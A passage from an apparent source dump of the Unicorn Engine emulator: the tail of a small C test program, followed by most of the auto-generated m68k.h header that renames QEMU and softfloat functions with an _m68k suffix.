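    }
    printf("QUOT10(u,n)==u/10**n for all u in [0,9999], n in [0,4]\n");
    return 0;
}
/* ------------------------------------------------------------------ */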
unicorn-2.1.1/qemu/m68k.h
/* Autogen header for Unicorn Engine - DO NOT MODIFY */ #ifndef UNICORN_AUTOGEN_m68k_H #define UNICORN_AUTOGEN_m68k_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _m68k #endif #define unicorn_fill_tlb unicorn_fill_tlb_m68k #define reg_read reg_read_m68k #define reg_write reg_write_m68k #define uc_init uc_init_m68k #define uc_add_inline_hook uc_add_inline_hook_m68k #define uc_del_inline_hook uc_del_inline_hook_m68k #define tb_invalidate_phys_range tb_invalidate_phys_range_m68k #define use_idiv_instructions use_idiv_instructions_m68k #define arm_arch arm_arch_m68k #define tb_target_set_jmp_target tb_target_set_jmp_target_m68k #define have_bmi1 have_bmi1_m68k #define have_popcnt have_popcnt_m68k #define have_avx1 have_avx1_m68k #define have_avx2 have_avx2_m68k #define have_isa have_isa_m68k #define have_altivec have_altivec_m68k #define have_vsx have_vsx_m68k #define flush_icache_range flush_icache_range_m68k #define s390_facilities s390_facilities_m68k #define tcg_dump_op tcg_dump_op_m68k #define tcg_dump_ops tcg_dump_ops_m68k #define tcg_gen_and_i64 tcg_gen_and_i64_m68k #define tcg_gen_discard_i64 tcg_gen_discard_i64_m68k #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_m68k #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_m68k #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_m68k #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_m68k #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_m68k #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_m68k #define tcg_gen_ld_i64 tcg_gen_ld_i64_m68k #define tcg_gen_mov_i64 tcg_gen_mov_i64_m68k #define tcg_gen_movi_i64 tcg_gen_movi_i64_m68k #define tcg_gen_mul_i64 tcg_gen_mul_i64_m68k #define tcg_gen_or_i64 tcg_gen_or_i64_m68k #define tcg_gen_sar_i64 tcg_gen_sar_i64_m68k #define tcg_gen_shl_i64 tcg_gen_shl_i64_m68k #define tcg_gen_shr_i64 tcg_gen_shr_i64_m68k #define tcg_gen_st_i64 tcg_gen_st_i64_m68k #define tcg_gen_xor_i64 tcg_gen_xor_i64_m68k #define cpu_icount_to_ns cpu_icount_to_ns_m68k #define cpu_is_stopped cpu_is_stopped_m68k #define cpu_get_ticks cpu_get_ticks_m68k #define cpu_get_clock cpu_get_clock_m68k #define cpu_resume cpu_resume_m68k #define qemu_init_vcpu qemu_init_vcpu_m68k #define cpu_stop_current cpu_stop_current_m68k #define resume_all_vcpus resume_all_vcpus_m68k #define vm_start vm_start_m68k #define address_space_dispatch_compact address_space_dispatch_compact_m68k #define flatview_translate flatview_translate_m68k #define address_space_translate_for_iotlb address_space_translate_for_iotlb_m68k #define qemu_get_cpu qemu_get_cpu_m68k #define cpu_address_space_init cpu_address_space_init_m68k #define cpu_get_address_space cpu_get_address_space_m68k #define cpu_exec_unrealizefn cpu_exec_unrealizefn_m68k #define cpu_exec_initfn
cpu_exec_initfn_m68k #define cpu_exec_realizefn cpu_exec_realizefn_m68k #define tb_invalidate_phys_addr tb_invalidate_phys_addr_m68k #define cpu_watchpoint_insert cpu_watchpoint_insert_m68k #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_m68k #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_m68k #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_m68k #define cpu_breakpoint_insert cpu_breakpoint_insert_m68k #define cpu_breakpoint_remove cpu_breakpoint_remove_m68k #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_m68k #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_m68k #define cpu_abort cpu_abort_m68k #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_m68k #define memory_region_section_get_iotlb memory_region_section_get_iotlb_m68k #define flatview_add_to_dispatch flatview_add_to_dispatch_m68k #define qemu_ram_get_host_addr qemu_ram_get_host_addr_m68k #define qemu_ram_get_offset qemu_ram_get_offset_m68k #define qemu_ram_get_used_length qemu_ram_get_used_length_m68k #define qemu_ram_is_shared qemu_ram_is_shared_m68k #define qemu_ram_pagesize qemu_ram_pagesize_m68k #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_m68k #define qemu_ram_alloc qemu_ram_alloc_m68k #define qemu_ram_free qemu_ram_free_m68k #define qemu_map_ram_ptr qemu_map_ram_ptr_m68k #define qemu_ram_block_host_offset qemu_ram_block_host_offset_m68k #define qemu_ram_block_from_host qemu_ram_block_from_host_m68k #define qemu_ram_addr_from_host qemu_ram_addr_from_host_m68k #define cpu_check_watchpoint cpu_check_watchpoint_m68k #define iotlb_to_section iotlb_to_section_m68k #define address_space_dispatch_new address_space_dispatch_new_m68k #define address_space_dispatch_free address_space_dispatch_free_m68k #define flatview_read_continue flatview_read_continue_m68k #define address_space_read_full address_space_read_full_m68k #define address_space_write address_space_write_m68k #define address_space_rw address_space_rw_m68k #define cpu_physical_memory_rw cpu_physical_memory_rw_m68k #define address_space_write_rom address_space_write_rom_m68k #define cpu_flush_icache_range cpu_flush_icache_range_m68k #define cpu_exec_init_all cpu_exec_init_all_m68k #define address_space_access_valid address_space_access_valid_m68k #define address_space_map address_space_map_m68k #define address_space_unmap address_space_unmap_m68k #define cpu_physical_memory_map cpu_physical_memory_map_m68k #define cpu_physical_memory_unmap cpu_physical_memory_unmap_m68k #define cpu_memory_rw_debug cpu_memory_rw_debug_m68k #define qemu_target_page_size qemu_target_page_size_m68k #define qemu_target_page_bits qemu_target_page_bits_m68k #define qemu_target_page_bits_min qemu_target_page_bits_min_m68k #define target_words_bigendian target_words_bigendian_m68k #define cpu_physical_memory_is_io cpu_physical_memory_is_io_m68k #define ram_block_discard_range ram_block_discard_range_m68k #define ramblock_is_pmem ramblock_is_pmem_m68k #define page_size_init page_size_init_m68k #define set_preferred_target_page_bits set_preferred_target_page_bits_m68k #define finalize_target_page_bits finalize_target_page_bits_m68k #define cpu_outb cpu_outb_m68k #define cpu_outw cpu_outw_m68k #define cpu_outl cpu_outl_m68k #define cpu_inb cpu_inb_m68k #define cpu_inw cpu_inw_m68k #define cpu_inl cpu_inl_m68k #define memory_map memory_map_m68k #define memory_map_io memory_map_io_m68k #define memory_map_ptr memory_map_ptr_m68k #define memory_cow memory_cow_m68k #define 
memory_unmap memory_unmap_m68k #define memory_moveout memory_moveout_m68k #define memory_movein memory_movein_m68k #define memory_free memory_free_m68k #define flatview_unref flatview_unref_m68k #define address_space_get_flatview address_space_get_flatview_m68k #define memory_region_transaction_begin memory_region_transaction_begin_m68k #define memory_region_transaction_commit memory_region_transaction_commit_m68k #define memory_region_init memory_region_init_m68k #define memory_region_access_valid memory_region_access_valid_m68k #define memory_region_dispatch_read memory_region_dispatch_read_m68k #define memory_region_dispatch_write memory_region_dispatch_write_m68k #define memory_region_init_io memory_region_init_io_m68k #define memory_region_init_ram_ptr memory_region_init_ram_ptr_m68k #define memory_region_size memory_region_size_m68k #define memory_region_set_readonly memory_region_set_readonly_m68k #define memory_region_get_ram_ptr memory_region_get_ram_ptr_m68k #define memory_region_from_host memory_region_from_host_m68k #define memory_region_get_ram_addr memory_region_get_ram_addr_m68k #define memory_region_add_subregion memory_region_add_subregion_m68k #define memory_region_del_subregion memory_region_del_subregion_m68k #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_m68k #define memory_region_find memory_region_find_m68k #define memory_region_filter_subregions memory_region_filter_subregions_m68k #define memory_listener_register memory_listener_register_m68k #define memory_listener_unregister memory_listener_unregister_m68k #define address_space_remove_listeners address_space_remove_listeners_m68k #define address_space_init address_space_init_m68k #define address_space_destroy address_space_destroy_m68k #define memory_region_init_ram memory_region_init_ram_m68k #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_m68k #define find_memory_mapping find_memory_mapping_m68k #define exec_inline_op exec_inline_op_m68k #define floatx80_default_nan floatx80_default_nan_m68k #define float_raise float_raise_m68k #define float16_is_quiet_nan float16_is_quiet_nan_m68k #define float16_is_signaling_nan float16_is_signaling_nan_m68k #define float32_is_quiet_nan float32_is_quiet_nan_m68k #define float32_is_signaling_nan float32_is_signaling_nan_m68k #define float64_is_quiet_nan float64_is_quiet_nan_m68k #define float64_is_signaling_nan float64_is_signaling_nan_m68k #define floatx80_is_quiet_nan floatx80_is_quiet_nan_m68k #define floatx80_is_signaling_nan floatx80_is_signaling_nan_m68k #define floatx80_silence_nan floatx80_silence_nan_m68k #define propagateFloatx80NaN propagateFloatx80NaN_m68k #define float128_is_quiet_nan float128_is_quiet_nan_m68k #define float128_is_signaling_nan float128_is_signaling_nan_m68k #define float128_silence_nan float128_silence_nan_m68k #define float16_add float16_add_m68k #define float16_sub float16_sub_m68k #define float32_add float32_add_m68k #define float32_sub float32_sub_m68k #define float64_add float64_add_m68k #define float64_sub float64_sub_m68k #define float16_mul float16_mul_m68k #define float32_mul float32_mul_m68k #define float64_mul float64_mul_m68k #define float16_muladd float16_muladd_m68k #define float32_muladd float32_muladd_m68k #define float64_muladd float64_muladd_m68k #define float16_div float16_div_m68k #define float32_div float32_div_m68k #define float64_div float64_div_m68k #define float16_to_float32 float16_to_float32_m68k #define float16_to_float64 float16_to_float64_m68k #define 
float32_to_float16 float32_to_float16_m68k #define float32_to_float64 float32_to_float64_m68k #define float64_to_float16 float64_to_float16_m68k #define float64_to_float32 float64_to_float32_m68k #define float16_round_to_int float16_round_to_int_m68k #define float32_round_to_int float32_round_to_int_m68k #define float64_round_to_int float64_round_to_int_m68k #define float16_to_int16_scalbn float16_to_int16_scalbn_m68k #define float16_to_int32_scalbn float16_to_int32_scalbn_m68k #define float16_to_int64_scalbn float16_to_int64_scalbn_m68k #define float32_to_int16_scalbn float32_to_int16_scalbn_m68k #define float32_to_int32_scalbn float32_to_int32_scalbn_m68k #define float32_to_int64_scalbn float32_to_int64_scalbn_m68k #define float64_to_int16_scalbn float64_to_int16_scalbn_m68k #define float64_to_int32_scalbn float64_to_int32_scalbn_m68k #define float64_to_int64_scalbn float64_to_int64_scalbn_m68k #define float16_to_int16 float16_to_int16_m68k #define float16_to_int32 float16_to_int32_m68k #define float16_to_int64 float16_to_int64_m68k #define float32_to_int16 float32_to_int16_m68k #define float32_to_int32 float32_to_int32_m68k #define float32_to_int64 float32_to_int64_m68k #define float64_to_int16 float64_to_int16_m68k #define float64_to_int32 float64_to_int32_m68k #define float64_to_int64 float64_to_int64_m68k #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_m68k #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_m68k #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_m68k #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_m68k #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_m68k #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_m68k #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_m68k #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_m68k #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_m68k #define float16_to_uint16_scalbn float16_to_uint16_scalbn_m68k #define float16_to_uint32_scalbn float16_to_uint32_scalbn_m68k #define float16_to_uint64_scalbn float16_to_uint64_scalbn_m68k #define float32_to_uint16_scalbn float32_to_uint16_scalbn_m68k #define float32_to_uint32_scalbn float32_to_uint32_scalbn_m68k #define float32_to_uint64_scalbn float32_to_uint64_scalbn_m68k #define float64_to_uint16_scalbn float64_to_uint16_scalbn_m68k #define float64_to_uint32_scalbn float64_to_uint32_scalbn_m68k #define float64_to_uint64_scalbn float64_to_uint64_scalbn_m68k #define float16_to_uint16 float16_to_uint16_m68k #define float16_to_uint32 float16_to_uint32_m68k #define float16_to_uint64 float16_to_uint64_m68k #define float32_to_uint16 float32_to_uint16_m68k #define float32_to_uint32 float32_to_uint32_m68k #define float32_to_uint64 float32_to_uint64_m68k #define float64_to_uint16 float64_to_uint16_m68k #define float64_to_uint32 float64_to_uint32_m68k #define float64_to_uint64 float64_to_uint64_m68k #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_m68k #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_m68k #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_m68k #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_m68k #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_m68k #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_m68k #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_m68k 
#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_m68k #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_m68k #define int64_to_float16_scalbn int64_to_float16_scalbn_m68k #define int32_to_float16_scalbn int32_to_float16_scalbn_m68k #define int16_to_float16_scalbn int16_to_float16_scalbn_m68k #define int64_to_float16 int64_to_float16_m68k #define int32_to_float16 int32_to_float16_m68k #define int16_to_float16 int16_to_float16_m68k #define int64_to_float32_scalbn int64_to_float32_scalbn_m68k #define int32_to_float32_scalbn int32_to_float32_scalbn_m68k #define int16_to_float32_scalbn int16_to_float32_scalbn_m68k #define int64_to_float32 int64_to_float32_m68k #define int32_to_float32 int32_to_float32_m68k #define int16_to_float32 int16_to_float32_m68k #define int64_to_float64_scalbn int64_to_float64_scalbn_m68k #define int32_to_float64_scalbn int32_to_float64_scalbn_m68k #define int16_to_float64_scalbn int16_to_float64_scalbn_m68k #define int64_to_float64 int64_to_float64_m68k #define int32_to_float64 int32_to_float64_m68k #define int16_to_float64 int16_to_float64_m68k #define uint64_to_float16_scalbn uint64_to_float16_scalbn_m68k #define uint32_to_float16_scalbn uint32_to_float16_scalbn_m68k #define uint16_to_float16_scalbn uint16_to_float16_scalbn_m68k #define uint64_to_float16 uint64_to_float16_m68k #define uint32_to_float16 uint32_to_float16_m68k #define uint16_to_float16 uint16_to_float16_m68k #define uint64_to_float32_scalbn uint64_to_float32_scalbn_m68k #define uint32_to_float32_scalbn uint32_to_float32_scalbn_m68k #define uint16_to_float32_scalbn uint16_to_float32_scalbn_m68k #define uint64_to_float32 uint64_to_float32_m68k #define uint32_to_float32 uint32_to_float32_m68k #define uint16_to_float32 uint16_to_float32_m68k #define uint64_to_float64_scalbn uint64_to_float64_scalbn_m68k #define uint32_to_float64_scalbn uint32_to_float64_scalbn_m68k #define uint16_to_float64_scalbn uint16_to_float64_scalbn_m68k #define uint64_to_float64 uint64_to_float64_m68k #define uint32_to_float64 uint32_to_float64_m68k #define uint16_to_float64 uint16_to_float64_m68k #define float16_min float16_min_m68k #define float16_minnum float16_minnum_m68k #define float16_minnummag float16_minnummag_m68k #define float16_max float16_max_m68k #define float16_maxnum float16_maxnum_m68k #define float16_maxnummag float16_maxnummag_m68k #define float32_min float32_min_m68k #define float32_minnum float32_minnum_m68k #define float32_minnummag float32_minnummag_m68k #define float32_max float32_max_m68k #define float32_maxnum float32_maxnum_m68k #define float32_maxnummag float32_maxnummag_m68k #define float64_min float64_min_m68k #define float64_minnum float64_minnum_m68k #define float64_minnummag float64_minnummag_m68k #define float64_max float64_max_m68k #define float64_maxnum float64_maxnum_m68k #define float64_maxnummag float64_maxnummag_m68k #define float16_compare float16_compare_m68k #define float16_compare_quiet float16_compare_quiet_m68k #define float32_compare float32_compare_m68k #define float32_compare_quiet float32_compare_quiet_m68k #define float64_compare float64_compare_m68k #define float64_compare_quiet float64_compare_quiet_m68k #define float16_scalbn float16_scalbn_m68k #define float32_scalbn float32_scalbn_m68k #define float64_scalbn float64_scalbn_m68k #define float16_sqrt float16_sqrt_m68k #define float32_sqrt float32_sqrt_m68k #define float64_sqrt float64_sqrt_m68k #define float16_default_nan float16_default_nan_m68k #define float32_default_nan 
float32_default_nan_m68k #define float64_default_nan float64_default_nan_m68k #define float128_default_nan float128_default_nan_m68k #define float16_silence_nan float16_silence_nan_m68k #define float32_silence_nan float32_silence_nan_m68k #define float64_silence_nan float64_silence_nan_m68k #define float16_squash_input_denormal float16_squash_input_denormal_m68k #define float32_squash_input_denormal float32_squash_input_denormal_m68k #define float64_squash_input_denormal float64_squash_input_denormal_m68k #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_m68k #define roundAndPackFloatx80 roundAndPackFloatx80_m68k #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_m68k #define int32_to_floatx80 int32_to_floatx80_m68k #define int32_to_float128 int32_to_float128_m68k #define int64_to_floatx80 int64_to_floatx80_m68k #define int64_to_float128 int64_to_float128_m68k #define uint64_to_float128 uint64_to_float128_m68k #define float32_to_floatx80 float32_to_floatx80_m68k #define float32_to_float128 float32_to_float128_m68k #define float32_rem float32_rem_m68k #define float32_exp2 float32_exp2_m68k #define float32_log2 float32_log2_m68k #define float32_eq float32_eq_m68k #define float32_le float32_le_m68k #define float32_lt float32_lt_m68k #define float32_unordered float32_unordered_m68k #define float32_eq_quiet float32_eq_quiet_m68k #define float32_le_quiet float32_le_quiet_m68k #define float32_lt_quiet float32_lt_quiet_m68k #define float32_unordered_quiet float32_unordered_quiet_m68k #define float64_to_floatx80 float64_to_floatx80_m68k #define float64_to_float128 float64_to_float128_m68k #define float64_rem float64_rem_m68k #define float64_log2 float64_log2_m68k #define float64_eq float64_eq_m68k #define float64_le float64_le_m68k #define float64_lt float64_lt_m68k #define float64_unordered float64_unordered_m68k #define float64_eq_quiet float64_eq_quiet_m68k #define float64_le_quiet float64_le_quiet_m68k #define float64_lt_quiet float64_lt_quiet_m68k #define float64_unordered_quiet float64_unordered_quiet_m68k #define floatx80_to_int32 floatx80_to_int32_m68k #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_m68k #define floatx80_to_int64 floatx80_to_int64_m68k #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_m68k #define floatx80_to_float32 floatx80_to_float32_m68k #define floatx80_to_float64 floatx80_to_float64_m68k #define floatx80_to_float128 floatx80_to_float128_m68k #define floatx80_round floatx80_round_m68k #define floatx80_round_to_int floatx80_round_to_int_m68k #define floatx80_add floatx80_add_m68k #define floatx80_sub floatx80_sub_m68k #define floatx80_mul floatx80_mul_m68k #define floatx80_div floatx80_div_m68k #define floatx80_rem floatx80_rem_m68k #define floatx80_sqrt floatx80_sqrt_m68k #define floatx80_eq floatx80_eq_m68k #define floatx80_le floatx80_le_m68k #define floatx80_lt floatx80_lt_m68k #define floatx80_unordered floatx80_unordered_m68k #define floatx80_eq_quiet floatx80_eq_quiet_m68k #define floatx80_le_quiet floatx80_le_quiet_m68k #define floatx80_lt_quiet floatx80_lt_quiet_m68k #define floatx80_unordered_quiet floatx80_unordered_quiet_m68k #define float128_to_int32 float128_to_int32_m68k #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_m68k #define float128_to_int64 float128_to_int64_m68k #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_m68k #define float128_to_uint64 float128_to_uint64_m68k #define float128_to_uint64_round_to_zero 
float128_to_uint64_round_to_zero_m68k #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_m68k #define float128_to_uint32 float128_to_uint32_m68k #define float128_to_float32 float128_to_float32_m68k #define float128_to_float64 float128_to_float64_m68k #define float128_to_floatx80 float128_to_floatx80_m68k #define float128_round_to_int float128_round_to_int_m68k #define float128_add float128_add_m68k #define float128_sub float128_sub_m68k #define float128_mul float128_mul_m68k #define float128_div float128_div_m68k #define float128_rem float128_rem_m68k #define float128_sqrt float128_sqrt_m68k #define float128_eq float128_eq_m68k #define float128_le float128_le_m68k #define float128_lt float128_lt_m68k #define float128_unordered float128_unordered_m68k #define float128_eq_quiet float128_eq_quiet_m68k #define float128_le_quiet float128_le_quiet_m68k #define float128_lt_quiet float128_lt_quiet_m68k #define float128_unordered_quiet float128_unordered_quiet_m68k #define floatx80_compare floatx80_compare_m68k #define floatx80_compare_quiet floatx80_compare_quiet_m68k #define float128_compare float128_compare_m68k #define float128_compare_quiet float128_compare_quiet_m68k #define floatx80_scalbn floatx80_scalbn_m68k #define float128_scalbn float128_scalbn_m68k #define softfloat_init softfloat_init_m68k #define tcg_optimize tcg_optimize_m68k #define gen_new_label gen_new_label_m68k #define tcg_can_emit_vec_op tcg_can_emit_vec_op_m68k #define tcg_expand_vec_op tcg_expand_vec_op_m68k #define tcg_register_jit tcg_register_jit_m68k #define tcg_tb_insert tcg_tb_insert_m68k #define tcg_tb_remove tcg_tb_remove_m68k #define tcg_tb_lookup tcg_tb_lookup_m68k #define tcg_tb_foreach tcg_tb_foreach_m68k #define tcg_nb_tbs tcg_nb_tbs_m68k #define tcg_region_reset_all tcg_region_reset_all_m68k #define tcg_region_init tcg_region_init_m68k #define tcg_code_size tcg_code_size_m68k #define tcg_code_capacity tcg_code_capacity_m68k #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_m68k #define tcg_malloc_internal tcg_malloc_internal_m68k #define tcg_pool_reset tcg_pool_reset_m68k #define tcg_context_init tcg_context_init_m68k #define tcg_tb_alloc tcg_tb_alloc_m68k #define tcg_prologue_init tcg_prologue_init_m68k #define tcg_func_start tcg_func_start_m68k #define tcg_set_frame tcg_set_frame_m68k #define tcg_global_mem_new_internal tcg_global_mem_new_internal_m68k #define tcg_temp_new_internal tcg_temp_new_internal_m68k #define tcg_temp_new_vec tcg_temp_new_vec_m68k #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_m68k #define tcg_temp_free_internal tcg_temp_free_internal_m68k #define tcg_const_i32 tcg_const_i32_m68k #define tcg_const_i64 tcg_const_i64_m68k #define tcg_const_local_i32 tcg_const_local_i32_m68k #define tcg_const_local_i64 tcg_const_local_i64_m68k #define tcg_op_supported tcg_op_supported_m68k #define tcg_gen_callN tcg_gen_callN_m68k #define tcg_op_remove tcg_op_remove_m68k #define tcg_emit_op tcg_emit_op_m68k #define tcg_op_insert_before tcg_op_insert_before_m68k #define tcg_op_insert_after tcg_op_insert_after_m68k #define tcg_cpu_exec_time tcg_cpu_exec_time_m68k #define tcg_gen_code tcg_gen_code_m68k #define tcg_gen_op1 tcg_gen_op1_m68k #define tcg_gen_op2 tcg_gen_op2_m68k #define tcg_gen_op3 tcg_gen_op3_m68k #define tcg_gen_op4 tcg_gen_op4_m68k #define tcg_gen_op5 tcg_gen_op5_m68k #define tcg_gen_op6 tcg_gen_op6_m68k #define tcg_gen_mb tcg_gen_mb_m68k #define tcg_gen_addi_i32 tcg_gen_addi_i32_m68k #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_m68k #define 
tcg_gen_subi_i32 tcg_gen_subi_i32_m68k #define tcg_gen_andi_i32 tcg_gen_andi_i32_m68k #define tcg_gen_ori_i32 tcg_gen_ori_i32_m68k #define tcg_gen_xori_i32 tcg_gen_xori_i32_m68k #define tcg_gen_shli_i32 tcg_gen_shli_i32_m68k #define tcg_gen_shri_i32 tcg_gen_shri_i32_m68k #define tcg_gen_sari_i32 tcg_gen_sari_i32_m68k #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_m68k #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_m68k #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_m68k #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_m68k #define tcg_gen_muli_i32 tcg_gen_muli_i32_m68k #define tcg_gen_div_i32 tcg_gen_div_i32_m68k #define tcg_gen_rem_i32 tcg_gen_rem_i32_m68k #define tcg_gen_divu_i32 tcg_gen_divu_i32_m68k #define tcg_gen_remu_i32 tcg_gen_remu_i32_m68k #define tcg_gen_andc_i32 tcg_gen_andc_i32_m68k #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_m68k #define tcg_gen_nand_i32 tcg_gen_nand_i32_m68k #define tcg_gen_nor_i32 tcg_gen_nor_i32_m68k #define tcg_gen_orc_i32 tcg_gen_orc_i32_m68k #define tcg_gen_clz_i32 tcg_gen_clz_i32_m68k #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_m68k #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_m68k #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_m68k #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_m68k #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_m68k #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_m68k #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_m68k #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_m68k #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_m68k #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_m68k #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_m68k #define tcg_gen_extract_i32 tcg_gen_extract_i32_m68k #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_m68k #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_m68k #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_m68k #define tcg_gen_add2_i32 tcg_gen_add2_i32_m68k #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_m68k #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_m68k #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_m68k #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_m68k #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_m68k #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_m68k #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_m68k #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_m68k #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_m68k #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_m68k #define tcg_gen_smin_i32 tcg_gen_smin_i32_m68k #define tcg_gen_umin_i32 tcg_gen_umin_i32_m68k #define tcg_gen_smax_i32 tcg_gen_smax_i32_m68k #define tcg_gen_umax_i32 tcg_gen_umax_i32_m68k #define tcg_gen_abs_i32 tcg_gen_abs_i32_m68k #define tcg_gen_addi_i64 tcg_gen_addi_i64_m68k #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_m68k #define tcg_gen_subi_i64 tcg_gen_subi_i64_m68k #define tcg_gen_andi_i64 tcg_gen_andi_i64_m68k #define tcg_gen_ori_i64 tcg_gen_ori_i64_m68k #define tcg_gen_xori_i64 tcg_gen_xori_i64_m68k #define tcg_gen_shli_i64 tcg_gen_shli_i64_m68k #define tcg_gen_shri_i64 tcg_gen_shri_i64_m68k #define tcg_gen_sari_i64 tcg_gen_sari_i64_m68k #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_m68k #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_m68k #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_m68k #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_m68k #define tcg_gen_muli_i64 tcg_gen_muli_i64_m68k #define tcg_gen_div_i64 tcg_gen_div_i64_m68k #define tcg_gen_rem_i64 tcg_gen_rem_i64_m68k #define tcg_gen_divu_i64 tcg_gen_divu_i64_m68k #define tcg_gen_remu_i64 tcg_gen_remu_i64_m68k #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_m68k #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_m68k #define 
tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_m68k #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_m68k #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_m68k #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_m68k #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_m68k #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_m68k #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_m68k #define tcg_gen_not_i64 tcg_gen_not_i64_m68k #define tcg_gen_andc_i64 tcg_gen_andc_i64_m68k #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_m68k #define tcg_gen_nand_i64 tcg_gen_nand_i64_m68k #define tcg_gen_nor_i64 tcg_gen_nor_i64_m68k #define tcg_gen_orc_i64 tcg_gen_orc_i64_m68k #define tcg_gen_clz_i64 tcg_gen_clz_i64_m68k #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_m68k #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_m68k #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_m68k #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_m68k #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_m68k #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_m68k #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_m68k #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_m68k #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_m68k #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_m68k #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_m68k #define tcg_gen_extract_i64 tcg_gen_extract_i64_m68k #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_m68k #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_m68k #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_m68k #define tcg_gen_add2_i64 tcg_gen_add2_i64_m68k #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_m68k #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_m68k #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_m68k #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_m68k #define tcg_gen_smin_i64 